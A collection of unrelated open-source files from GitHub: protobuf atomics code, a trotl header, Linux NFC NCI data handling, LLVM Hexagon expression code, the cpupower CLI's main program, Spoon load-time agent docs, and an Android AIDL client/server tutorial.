{ ((AtomicLocation64)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_release, std::memory_order_relaxed); return old_value; } inline void NoBarrier_Store(volatile Atomic64* ptr, Atomic64 value) { ((AtomicLocation64)ptr)->store(value, std::memory_order_relaxed); } inline void Acquire_Store(volatile Atomic64* ptr, Atomic64 value) { ((AtomicLocation64)ptr)->store(value, std::memory_order_relaxed); MemoryBarrierInternal(); } inline void Release_Store(volatile Atomic64* ptr, Atomic64 value) { ((AtomicLocation64)ptr)->store(value, std::memory_order_release); } inline Atomic64 NoBarrier_Load(volatile const Atomic64* ptr) { return ((AtomicLocation64)ptr)->load(std::memory_order_relaxed); } inline Atomic64 Acquire_Load(volatile const Atomic64* ptr) { return ((AtomicLocation64)ptr)->load(std::memory_order_acquire); } inline Atomic64 Release_Load(volatile const Atomic64* ptr) { MemoryBarrierInternal(); return ((AtomicLocation64)ptr)->load(std::memory_order_relaxed); } #endif // defined(GOOGLE_PROTOBUF_ARCH_64_BIT) } // namespace internal } // namespace protobuf } // namespace google #endif // GOOGLE_PROTOBUF_ATOMICOPS_INTERNALS_GENERIC_C11_ATOMIC_H_
{ "pile_set_name": "Github" }
// // forked from OCIPL Version 1.3 // by Ivan Brezina <[email protected]> /* All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ //TODO - SQLT_VST when should I use this datatype? #ifndef TROTL_MISC_H_ #define TROTL_MISC_H_ #include "trotl_common.h" #include "trotl_export.h" #include "trotl_handle.h" #include "trotl_var.h" #include "trotl_describe.h" #include "trotl_parser.h" namespace trotl { /* Misc datatype - temporary solution This class represents any datatype, whose value can be converted into a string */ struct TROTL_EXPORT BindParMisc: public BindPar { BindParMisc(unsigned int pos, SqlStatement &stmt, DescribeColumn* ct); BindParMisc(unsigned int pos, SqlStatement &stmt, BindVarDecl &decl); virtual ~BindParMisc() {} virtual tstring get_string(unsigned int row) const { return is_null(row) ? "NULL" : tstring(((char*)valuep)+(row * value_sz)); } protected: BindParMisc(const BindParMisc &other); }; }; #endif
{ "pile_set_name": "Github" }
/* * The NFC Controller Interface is the communication protocol between an * NFC Controller (NFCC) and a Device Host (DH). * * Copyright (C) 2011 Texas Instruments, Inc. * * Written by Ilan Elias <[email protected]> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 * as published by the Free Software Foundation * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA * */ #define pr_fmt(fmt) KBUILD_MODNAME ": %s: " fmt, __func__ #include <linux/types.h> #include <linux/interrupt.h> #include <linux/wait.h> #include <linux/bitops.h> #include <linux/skbuff.h> #include "../nfc.h" #include <net/nfc/nci.h> #include <net/nfc/nci_core.h> #include <linux/nfc.h> /* Complete data exchange transaction and forward skb to nfc core */ void nci_data_exchange_complete(struct nci_dev *ndev, struct sk_buff *skb, int err) { data_exchange_cb_t cb = ndev->data_exchange_cb; void *cb_context = ndev->data_exchange_cb_context; pr_debug("len %d, err %d\n", skb ? skb->len : 0, err); /* data exchange is complete, stop the data timer */ del_timer_sync(&ndev->data_timer); clear_bit(NCI_DATA_EXCHANGE_TO, &ndev->flags); if (cb) { ndev->data_exchange_cb = NULL; ndev->data_exchange_cb_context = 0; /* forward skb to nfc core */ cb(cb_context, skb, err); } else if (skb) { pr_err("no rx callback, dropping rx data...\n"); /* no waiting callback, free skb */ kfree_skb(skb); } clear_bit(NCI_DATA_EXCHANGE, &ndev->flags); } /* ----------------- NCI TX Data ----------------- */ static inline void nci_push_data_hdr(struct nci_dev *ndev, __u8 conn_id, struct sk_buff *skb, __u8 pbf) { struct nci_data_hdr *hdr; int plen = skb->len; hdr = (struct nci_data_hdr *) skb_push(skb, NCI_DATA_HDR_SIZE); hdr->conn_id = conn_id; hdr->rfu = 0; hdr->plen = plen; nci_mt_set((__u8 *)hdr, NCI_MT_DATA_PKT); nci_pbf_set((__u8 *)hdr, pbf); skb->dev = (void *) ndev; } static int nci_queue_tx_data_frags(struct nci_dev *ndev, __u8 conn_id, struct sk_buff *skb) { int total_len = skb->len; unsigned char *data = skb->data; unsigned long flags; struct sk_buff_head frags_q; struct sk_buff *skb_frag; int frag_len; int rc = 0; pr_debug("conn_id 0x%x, total_len %d\n", conn_id, total_len); __skb_queue_head_init(&frags_q); while (total_len) { frag_len = min_t(int, total_len, ndev->max_data_pkt_payload_size); skb_frag = nci_skb_alloc(ndev, (NCI_DATA_HDR_SIZE + frag_len), GFP_KERNEL); if (skb_frag == NULL) { rc = -ENOMEM; goto free_exit; } skb_reserve(skb_frag, NCI_DATA_HDR_SIZE); /* first, copy the data */ memcpy(skb_put(skb_frag, frag_len), data, frag_len); /* second, set the header */ nci_push_data_hdr(ndev, conn_id, skb_frag, ((total_len == frag_len) ? 
(NCI_PBF_LAST) : (NCI_PBF_CONT))); __skb_queue_tail(&frags_q, skb_frag); data += frag_len; total_len -= frag_len; pr_debug("frag_len %d, remaining total_len %d\n", frag_len, total_len); } /* queue all fragments atomically */ spin_lock_irqsave(&ndev->tx_q.lock, flags); while ((skb_frag = __skb_dequeue(&frags_q)) != NULL) __skb_queue_tail(&ndev->tx_q, skb_frag); spin_unlock_irqrestore(&ndev->tx_q.lock, flags); /* free the original skb */ kfree_skb(skb); goto exit; free_exit: while ((skb_frag = __skb_dequeue(&frags_q)) != NULL) kfree_skb(skb_frag); exit: return rc; } /* Send NCI data */ int nci_send_data(struct nci_dev *ndev, __u8 conn_id, struct sk_buff *skb) { int rc = 0; pr_debug("conn_id 0x%x, plen %d\n", conn_id, skb->len); /* check if the packet need to be fragmented */ if (skb->len <= ndev->max_data_pkt_payload_size) { /* no need to fragment packet */ nci_push_data_hdr(ndev, conn_id, skb, NCI_PBF_LAST); skb_queue_tail(&ndev->tx_q, skb); } else { /* fragment packet and queue the fragments */ rc = nci_queue_tx_data_frags(ndev, conn_id, skb); if (rc) { pr_err("failed to fragment tx data packet\n"); goto free_exit; } } queue_work(ndev->tx_wq, &ndev->tx_work); goto exit; free_exit: kfree_skb(skb); exit: return rc; } /* ----------------- NCI RX Data ----------------- */ static void nci_add_rx_data_frag(struct nci_dev *ndev, struct sk_buff *skb, __u8 pbf) { int reassembly_len; int err = 0; if (ndev->rx_data_reassembly) { reassembly_len = ndev->rx_data_reassembly->len; /* first, make enough room for the already accumulated data */ if (skb_cow_head(skb, reassembly_len)) { pr_err("error adding room for accumulated rx data\n"); kfree_skb(skb); skb = 0; kfree_skb(ndev->rx_data_reassembly); ndev->rx_data_reassembly = 0; err = -ENOMEM; goto exit; } /* second, combine the two fragments */ memcpy(skb_push(skb, reassembly_len), ndev->rx_data_reassembly->data, reassembly_len); /* third, free old reassembly */ kfree_skb(ndev->rx_data_reassembly); ndev->rx_data_reassembly = 0; } if (pbf == NCI_PBF_CONT) { /* need to wait for next fragment, store skb and exit */ ndev->rx_data_reassembly = skb; return; } exit: nci_data_exchange_complete(ndev, skb, err); } /* Rx Data packet */ void nci_rx_data_packet(struct nci_dev *ndev, struct sk_buff *skb) { __u8 pbf = nci_pbf(skb->data); pr_debug("len %d\n", skb->len); pr_debug("NCI RX: MT=data, PBF=%d, conn_id=%d, plen=%d\n", nci_pbf(skb->data), nci_conn_id(skb->data), nci_plen(skb->data)); /* strip the nci data header */ skb_pull(skb, NCI_DATA_HDR_SIZE); if (ndev->target_active_prot == NFC_PROTO_MIFARE) { /* frame I/F => remove the status byte */ pr_debug("NFC_PROTO_MIFARE => remove the status byte\n"); skb_trim(skb, (skb->len - 1)); } nci_add_rx_data_frag(ndev, skb, pbf); }
{ "pile_set_name": "Github" }
//===-- HexagonMCExpr.cpp - Hexagon specific MC expression classes //----------===// // // The LLVM Compiler Infrastructure // // This file is distributed under the University of Illinois Open Source // License. See LICENSE.TXT for details. // //===----------------------------------------------------------------------===// #include "HexagonMCExpr.h" #include "llvm/MC/MCContext.h" #include "llvm/MC/MCValue.h" #include "llvm/Support/raw_ostream.h" using namespace llvm_ks; #define DEBUG_TYPE "hexagon-mcexpr" HexagonNoExtendOperand *HexagonNoExtendOperand::Create(MCExpr const *Expr, MCContext &Ctx) { return new (Ctx) HexagonNoExtendOperand(Expr); } bool HexagonNoExtendOperand::evaluateAsRelocatableImpl( MCValue &Res, MCAsmLayout const *Layout, MCFixup const *Fixup) const { return Expr->evaluateAsRelocatable(Res, Layout, Fixup); } void HexagonNoExtendOperand::visitUsedExpr(MCStreamer &Streamer) const {} MCFragment *llvm_ks::HexagonNoExtendOperand::findAssociatedFragment() const { return Expr->findAssociatedFragment(); } void HexagonNoExtendOperand::fixELFSymbolsInTLSFixups(MCAssembler &Asm) const {} MCExpr const *HexagonNoExtendOperand::getExpr() const { return Expr; } bool HexagonNoExtendOperand::classof(MCExpr const *E) { return E->getKind() == MCExpr::Target; } HexagonNoExtendOperand::HexagonNoExtendOperand(MCExpr const *Expr) : Expr(Expr) {} void HexagonNoExtendOperand::printImpl(raw_ostream &OS, const MCAsmInfo *MAI) const { Expr->print(OS, MAI); }
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0-only /* * (C) 2010,2011 Thomas Renninger <[email protected]>, Novell Inc. * * Ideas taken over from the perf userspace tool (included in the Linus * kernel git repo): subcommand builtins and param parsing. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/utsname.h> #include "builtin.h" #include "helpers/helpers.h" #include "helpers/bitmask.h" #define ARRAY_SIZE(x) (sizeof(x)/sizeof(x[0])) static int cmd_help(int argc, const char **argv); /* Global cpu_info object available for all binaries * Info only retrieved from CPU 0 * * Values will be zero/unknown on non X86 archs */ struct cpupower_cpu_info cpupower_cpu_info; int run_as_root; int base_cpu; /* Affected cpus chosen by -c/--cpu param */ struct bitmask *cpus_chosen; #ifdef DEBUG int be_verbose; #endif static void print_help(void); struct cmd_struct { const char *cmd; int (*main)(int, const char **); int needs_root; }; static struct cmd_struct commands[] = { { "frequency-info", cmd_freq_info, 0 }, { "frequency-set", cmd_freq_set, 1 }, { "idle-info", cmd_idle_info, 0 }, { "idle-set", cmd_idle_set, 1 }, { "set", cmd_set, 1 }, { "info", cmd_info, 0 }, { "monitor", cmd_monitor, 0 }, { "help", cmd_help, 0 }, /* { "bench", cmd_bench, 1 }, */ }; static void print_help(void) { unsigned int i; #ifdef DEBUG printf(_("Usage:\tcpupower [-d|--debug] [-c|--cpu cpulist ] <command> [<args>]\n")); #else printf(_("Usage:\tcpupower [-c|--cpu cpulist ] <command> [<args>]\n")); #endif printf(_("Supported commands are:\n")); for (i = 0; i < ARRAY_SIZE(commands); i++) printf("\t%s\n", commands[i].cmd); printf(_("\nNot all commands can make use of the -c cpulist option.\n")); printf(_("\nUse 'cpupower help <command>' for getting help for above commands.\n")); } static int print_man_page(const char *subpage) { int len; char *page; len = 10; /* enough for "cpupower-" */ if (subpage != NULL) len += strlen(subpage); page = malloc(len); if (!page) return -ENOMEM; sprintf(page, "cpupower"); if ((subpage != NULL) && strcmp(subpage, "help")) { strcat(page, "-"); strcat(page, subpage); } execlp("man", "man", page, NULL); /* should not be reached */ return -EINVAL; } static int cmd_help(int argc, const char **argv) { if (argc > 1) { print_man_page(argv[1]); /* exits within execlp() */ return EXIT_FAILURE; } print_help(); return EXIT_SUCCESS; } static void print_version(void) { printf(PACKAGE " " VERSION "\n"); printf(_("Report errors and bugs to %s, please.\n"), PACKAGE_BUGREPORT); } static void handle_options(int *argc, const char ***argv) { int ret, x, new_argc = 0; if (*argc < 1) return; for (x = 0; x < *argc && ((*argv)[x])[0] == '-'; x++) { const char *param = (*argv)[x]; if (!strcmp(param, "-h") || !strcmp(param, "--help")) { print_help(); exit(EXIT_SUCCESS); } else if (!strcmp(param, "-c") || !strcmp(param, "--cpu")) { if (*argc < 2) { print_help(); exit(EXIT_FAILURE); } if (!strcmp((*argv)[x+1], "all")) bitmask_setall(cpus_chosen); else { ret = bitmask_parselist( (*argv)[x+1], cpus_chosen); if (ret < 0) { fprintf(stderr, _("Error parsing cpu " "list\n")); exit(EXIT_FAILURE); } } x += 1; /* Cut out param: cpupower -c 1 info -> cpupower info */ new_argc += 2; continue; } else if (!strcmp(param, "-v") || !strcmp(param, "--version")) { print_version(); exit(EXIT_SUCCESS); #ifdef DEBUG } else if (!strcmp(param, "-d") || !strcmp(param, "--debug")) { be_verbose = 1; new_argc++; continue; #endif } else { 
fprintf(stderr, "Unknown option: %s\n", param); print_help(); exit(EXIT_FAILURE); } } *argc -= new_argc; *argv += new_argc; } int main(int argc, const char *argv[]) { const char *cmd; unsigned int i, ret; struct stat statbuf; struct utsname uts; char pathname[32]; cpus_chosen = bitmask_alloc(sysconf(_SC_NPROCESSORS_CONF)); argc--; argv += 1; handle_options(&argc, &argv); cmd = argv[0]; if (argc < 1) { print_help(); return EXIT_FAILURE; } setlocale(LC_ALL, ""); textdomain(PACKAGE); /* Turn "perf cmd --help" into "perf help cmd" */ if (argc > 1 && !strcmp(argv[1], "--help")) { argv[1] = argv[0]; argv[0] = cmd = "help"; } base_cpu = sched_getcpu(); if (base_cpu < 0) { fprintf(stderr, _("No valid cpus found.\n")); return EXIT_FAILURE; } get_cpu_info(&cpupower_cpu_info); run_as_root = !geteuid(); if (run_as_root) { ret = uname(&uts); sprintf(pathname, "/dev/cpu/%d/msr", base_cpu); if (!ret && !strcmp(uts.machine, "x86_64") && stat(pathname, &statbuf) != 0) { if (system("modprobe msr") == -1) fprintf(stderr, _("MSR access not available.\n")); } } for (i = 0; i < ARRAY_SIZE(commands); i++) { struct cmd_struct *p = commands + i; if (strcmp(p->cmd, cmd)) continue; if (!run_as_root && p->needs_root) { fprintf(stderr, _("Subcommand %s needs root " "privileges\n"), cmd); return EXIT_FAILURE; } ret = p->main(argc, argv); if (cpus_chosen) bitmask_free(cpus_chosen); return ret; } print_help(); return EXIT_FAILURE; }
{ "pile_set_name": "Github" }
---
title: Agent
tags: [usage]
keywords: agent, usage, java, loadtime
---

# Spoon Agent

Spoon can also be used to transform classes at load time in the JVM. For this, `SpoonClassFileTransformer` provides an abstraction of `ClassFileTransformer` where the user can define Spoon transformations. The bytecode of classes is decompiled on the fly when loaded, the Spoon AST is updated accordingly, and the code is recompiled on the fly.

The following example shows the definition of a basic JVM agent that inserts a tracing method call at the end of every method called `foo`. Here is the agent:

```java
public class Agent {
	public static void premain(String agentArgs, Instrumentation inst) {
		System.out.println( "Hello Agent" );

		//Create a SpoonClassFileTransformer, that
		// * excludes any classes not in our package from decompilation
		// * adds the statement System.out.println("Hello <className>"); to the (first) method named "foo" of every class
		SpoonClassFileTransformer transformer = new SpoonClassFileTransformer(
				cl -> cl.startsWith("org/my/package"),
				new InsertPrintTransformer()
		);

		inst.addTransformer(transformer);

		System.out.println( "Agent Done." );
	}
}
```

```java
public class InsertPrintTransformer implements TypeTransformer {

	@Override
	public boolean accept(CtType type) {
		if ((type instanceof CtClass) && type.getMethodsByName("foo").size() > 0) {
			return true;
		} else {
			return false;
		}
	}

	@Override
	public void transform(CtType type) {
		System.err.println("Transforming " + type.getQualifiedName());
		CtMethod main = (CtMethod) type.getMethodsByName("foo").get(0);
		main.getBody().addStatement(type.getFactory().createCodeSnippetStatement("System.out.println(\"Hello " + type.getQualifiedName() + "\");"));
		System.err.println("Done transforming " + type.getQualifiedName());
	}
}
```

:warning: The `SpoonClassFileTransformer` feature (and all features relying on decompilation) is not included in `spoon-core` but in `spoon-decompiler`. If you want to use these features you should declare a dependency on `spoon-decompiler`.
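For context, here is a minimal sketch of the raw `java.lang.instrument` hook that `SpoonClassFileTransformer` builds on. This is the standard JDK API, not Spoon code, and the class name `RawBytecodeAgent` is made up for illustration:

```java
import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.Instrumentation;
import java.security.ProtectionDomain;

public class RawBytecodeAgent {
	public static void premain(String agentArgs, Instrumentation inst) {
		inst.addTransformer(new ClassFileTransformer() {
			@Override
			public byte[] transform(ClassLoader loader, String className,
									Class<?> classBeingRedefined,
									ProtectionDomain protectionDomain,
									byte[] classfileBuffer) {
				// Without Spoon you are handed raw bytecode here and must rewrite it
				// yourself; returning null leaves the class unchanged.
				return null;
			}
		});
	}
}
```

Spoon's added value is that instead of receiving an opaque `byte[]`, the transformer works on a decompiled `CtType` model of the class.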
{ "pile_set_name": "Github" }
# AIDL (Part 1) Demo

## 0x01 Demo

Create an Android project containing three modules: app_client, app_server and ipc:

- app_client: `com.android.application`, the Client
- app_server: `com.android.application`, the Server
- ipc: `com.android.library`, holds the AIDL and model files

### Create the AIDL files in ipc

```aidl
// IStudentManager.aidl
package com.ttdevs.ipc;

import com.ttdevs.ipc.Student;

/**
 * Student Manager
 */
interface IStudentManager {

    // String getStudent(String student); // if no tag is specified, the default is in
    // void addStudentWithNull(Student student); // custom types must specify a tag
    // void addStudentWithIn(String student); // methods with the same name cannot be defined?
    // oneway void addStudentWithOut(out Student student); // oneway cannot be combined with out
    // oneway void addStudentWithInout(inout Student student); // oneway cannot be combined with inout

    String getStudent(String student);

    oneway void addStudentOneway(in String student);

    void addStudentWithIn(in Student student);

    void addStudentWithOut(out Student student);

    void addStudentWithInout(inout Student student);

    Student addStudentWithInoutAndReturn(inout Student student);
}

// Student.aidl
package com.ttdevs.ipc;

// needs to be imported when in a different package
// import com.ttdevs.ipc;

parcelable Student;
```

### Create the Service in app_server

```java
public class StudentService extends Service {
    public StudentService() {
    }

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        return START_STICKY;
    }

    @Override
    public IBinder onBind(Intent intent) {
        return sBinder;
    }

    private static IStudentManager.Stub sBinder = new IStudentManager.Stub() {
        @Override
        public String getStudent(String student) throws RemoteException {
            LogUtils.d("getStudent: " + student);
            return "Tom,30";
        }

        @Override
        public void addStudentOneway(String student) throws RemoteException {
            LogUtils.d("addStudentOneway: start " + student);
            try {
                Thread.sleep(1000);
            } catch (InterruptedException e) {
                e.printStackTrace();
            }
            LogUtils.d("addStudentOneway: end " + student);
        }

        @Override
        public void addStudentWithIn(Student student) throws RemoteException {
            LogUtils.d("addStudentWithIn: " + student.toString());
            student.setName("Tom");
            student.setAge(30);
        }

        @Override
        public void addStudentWithOut(Student student) throws RemoteException {
            LogUtils.d("addStudentWithOut: " + student.toString());
            student.setName("Tom");
            student.setAge(30);
        }

        @Override
        public void addStudentWithInout(Student student) throws RemoteException {
            LogUtils.d("addStudentWithInout: " + student.toString());
            student.setName("Tom");
            student.setAge(30);
        }

        @Override
        public Student addStudentWithInoutAndReturn(Student student) throws RemoteException {
            LogUtils.d("addStudentWithInoutAndReturn: " + student.toString());
            student.setName("Tom");
            student.setAge(30);
            return student;
        }
    };
}
```

### Create a test Activity in app_client

```java
public class MainActivity extends AppCompatActivity implements View.OnClickListener {

    private IStudentManager mStudentManager;
    private Button btConnect;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        LogUtils.init(">>>>>Client ");

        btConnect = findViewById(R.id.bt_connect);

        bindService();
    }

    @Override
    public void onClick(View v) {
        try {
            String student = "Jim,18";
            switch (v.getId()) {
                case R.id.bt_connect:
                    bindService();
                    return;

                case R.id.bt_get:
                    String result = mStudentManager.getStudent(student);
                    LogUtils.d("getStudent: " + result);
                    return;

                case R.id.bt_oneway:
                    mStudentManager.addStudentOneway(student);
                    LogUtils.d("addStudentOneway: return");
                    return;

                default:
                    break;
            }
        } catch (RemoteException e) {
            e.printStackTrace();
        }

        try {
            Student student = new Student();
            student.setName("Jim");
            student.setAge(18);

            switch (v.getId()) {
                case R.id.bt_in:
                    mStudentManager.addStudentWithIn(student);
                    break;

                case R.id.bt_out:
                    LogUtils.d("addStudentWithOut: " + student.toString());
                    mStudentManager.addStudentWithOut(student);
                    break;

                case R.id.bt_inout:
                    LogUtils.d("addStudentWithInout: " + student.toString());
                    mStudentManager.addStudentWithInout(student);
                    break;

                case R.id.bt_inout_return:
                    LogUtils.d("addStudentWithInoutAndReturn: " + student.toString());
                    Student temp = mStudentManager.addStudentWithInoutAndReturn(student);
                    LogUtils.d("addStudentWithInoutAndReturn: " + temp.toString());
                    break;

                default:
                    break;
            }
            LogUtils.d(student.toString());
        } catch (RemoteException e) {
            e.printStackTrace();
        }
    }

    private void bindService() {
        try {
            bindService(Constant.getServerIntent(), new ServiceConnection() {
                @Override
                public void onServiceConnected(ComponentName name, IBinder service) {
                    mStudentManager = IStudentManager.Stub.asInterface(service);

                    LogUtils.d("Connect success.");
                    runOnUiThread(() -> btConnect.setEnabled(false));
                }

                @Override
                public void onServiceDisconnected(ComponentName name) {
                    mStudentManager = null;
                    runOnUiThread(() -> btConnect.setEnabled(true));
                }
            }, Context.BIND_AUTO_CREATE);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

Run the Server and the Client separately, then tap Connect on the Client (it connects automatically by default); data can then be exchanged between the Client and Server processes. After tapping every button on the Client once, the log looks like this:

```log
2020-09-11 14:46:29.029 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Connect success.

// Default case: the Server receives the Client's data and returns its own data to the Client
2020-09-11 14:46:32.354 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: getStudent: Jim,18
2020-09-11 14:46:32.355 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: getStudent: Tom,30

// oneway: the Client returns immediately after the call instead of waiting for the Server to finish
2020-09-11 14:46:37.396 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentOneway: return
2020-09-11 14:46:37.396 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentOneway: start Jim,18
2020-09-11 14:46:38.397 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentOneway: end Jim,18

// in: the Client's data reaches the Server, but the Server's changes do not affect the Client
2020-09-11 14:46:40.606 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentWithIn: Student{name='Jim', age=18}
2020-09-11 14:46:40.607 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Student{name='Jim', age=18}

// out: the Client's data is not passed to the Server, but the Server's data is passed back to the Client
2020-09-11 14:46:43.689 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentWithOut: Student{name='Jim', age=18}
2020-09-11 14:46:43.689 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentWithOut: Student{name='null', age=0}
2020-09-11 14:46:43.690 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Student{name='Tom', age=30}

// inout: data flows in both directions between Client and Server
2020-09-11 14:46:46.347 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentWithInout: Student{name='Jim', age=18}
2020-09-11 14:46:46.347 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentWithInout: Student{name='Jim', age=18}
2020-09-11 14:46:46.348 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Student{name='Tom', age=30}

// both the inout behaviour and the return value take effect
2020-09-11 14:46:48.419 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentWithInoutAndReturn: Student{name='Jim', age=18}
2020-09-11 14:46:48.420 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: addStudentWithInoutAndReturn: Student{name='Jim', age=18}
2020-09-11 14:46:48.421 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: addStudentWithInoutAndReturn: Student{name='Tom', age=30}
2020-09-11 14:46:48.421 5933-5933/com.ttdevs.ipc.client D/>>>>>Client: Student{name='Tom', age=30}

// The Client registers with the Server
2020-09-11 14:46:50.727 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: Register listener

// The Server sends data to the Client
2020-09-11 14:46:50.728 5933-5970/com.ttdevs.ipc.client D/>>>>>Client: From server: Student{name='Tom', age=31}
2020-09-11 14:46:51.890 6064-6102/com.ttdevs.ipc.server D/>>>>>Server: Unregister listener
```

## Callback Demo

The demo above mainly covers the Client actively making requests to the Server. How do we handle the case where the Server needs to actively send messages to the Client?

### Update the AIDL files in ipc

```aidl
// IStudentManager.aidl
package com.ttdevs.ipc;

import com.ttdevs.ipc.Student;
import com.ttdevs.ipc.IStudentListener;

/**
 * Student Manager
 */
interface IStudentManager {

    // ...

    oneway void register(IStudentListener listener);

    oneway void unregister(IStudentListener listener);
}

// IStudentListener.aidl
package com.ttdevs.ipc;

import com.ttdevs.ipc.Student;

interface IStudentListener {

    oneway void updateStudent(in Student student);
}
```

### Update app_server

```java
public class StudentService extends Service {

    // ...

    private static IStudentManager.Stub sBinder = new IStudentManager.Stub() {

        // ...

        private final RemoteCallbackList<IStudentListener> mCallbackList = new RemoteCallbackList<>();

        @Override
        public void register(IStudentListener listener) throws RemoteException {
            if (null != listener) {
                mCallbackList.register(listener);
                LogUtils.d("Register listener");
            }
            sendCallbackMessage();
        }

        @Override
        public void unregister(IStudentListener listener) throws RemoteException {
            if (null != listener) {
                mCallbackList.unregister(listener);
                LogUtils.d("Unregister listener");
            }
            sendCallbackMessage();
        }

        private final Handler mHandler = new Handler(Looper.getMainLooper());

        private void sendCallbackMessage() {
            mHandler.removeCallbacksAndMessages(null);

            final Student student = new Student();
            student.setName("Tom");
            student.setAge(30);
            mHandler.post(new Runnable() {
                @Override
                public void run() {
                    try {
                        if (mCallbackList.getRegisteredCallbackCount() <= 0) {
                            return;
                        }
                        student.setAge(student.getAge() + 1);

                        int num = mCallbackList.beginBroadcast();
                        for (int i = 0; i < num; i++) {
                            try {
                                mCallbackList.getBroadcastItem(i).updateStudent(student);
                            } catch (RemoteException e) {
                                e.printStackTrace();
                            }
                        }
                        mCallbackList.finishBroadcast();
                    } catch (Exception e) {
                        e.printStackTrace();
                    }

                    mHandler.postDelayed(this, 8000);
                }
            });
        }
    };
}
```

### Update app_client

```java
public class MainActivity extends AppCompatActivity implements View.OnClickListener {

    // ...

    @Override
    public void onClick(View v) {
        try {
            String student = "Jim,18";
            switch (v.getId()) {

                // ...

                case R.id.bt_register:
                    registerListener(true);
                    return;

                case R.id.bt_unregister:
                    registerListener(false);
                    return;

                default:
                    break;
            }
        } catch (RemoteException e) {
            e.printStackTrace();
        }

        // ...
    }

    private static final IStudentListener mListener = new IStudentListener.Stub() {
        @Override
        public void updateStudent(Student student) throws RemoteException {
            LogUtils.d("From server: " + student.toString());
        }
    };

    /**
     * Register / unregister
     *
     * @param register
     */
    private void registerListener(boolean register) {
        try {
            if (register) {
                mStudentManager.register(mListener);
            } else {
                mStudentManager.unregister(mListener);
            }
        } catch (RemoteException e) {
            e.printStackTrace();
        }
    }

    // ...
}
```

These are the common AIDL operations.

## 0xFF Reference

1. https://developer.android.com/guide/components/aidl
2. https://source.android.com/devices/architecture/aidl/overview
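Not shown in the demo above is the `Student` class itself. The following is a minimal sketch of what it presumably looks like; the field names and the `toString()` format are inferred from the log output, so treat the details as assumptions. The important point is that a class used as an `out` or `inout` AIDL parameter needs a public `readFromParcel(Parcel)` method in addition to the usual `Parcelable` plumbing, because the generated proxy uses it to copy the server-side changes back into the caller's object:

```java
import android.os.Parcel;
import android.os.Parcelable;

public class Student implements Parcelable {
    private String name;
    private int age;

    public Student() {}

    protected Student(Parcel in) {
        readFromParcel(in);
    }

    @Override
    public void writeToParcel(Parcel dest, int flags) {
        dest.writeString(name);
        dest.writeInt(age);
    }

    // Required for "out"/"inout" parameters: called by the generated code to
    // overwrite this object with the values written by the other process.
    public void readFromParcel(Parcel in) {
        name = in.readString();
        age = in.readInt();
    }

    @Override
    public int describeContents() { return 0; }

    public static final Creator<Student> CREATOR = new Creator<Student>() {
        @Override
        public Student createFromParcel(Parcel in) { return new Student(in); }

        @Override
        public Student[] newArray(int size) { return new Student[size]; }
    };

    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
    public int getAge() { return age; }
    public void setAge(int age) { this.age = age; }

    @Override
    public String toString() {
        return "Student{name='" + name + "', age=" + age + "}";
    }
}
```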
{ "pile_set_name": "Github" }
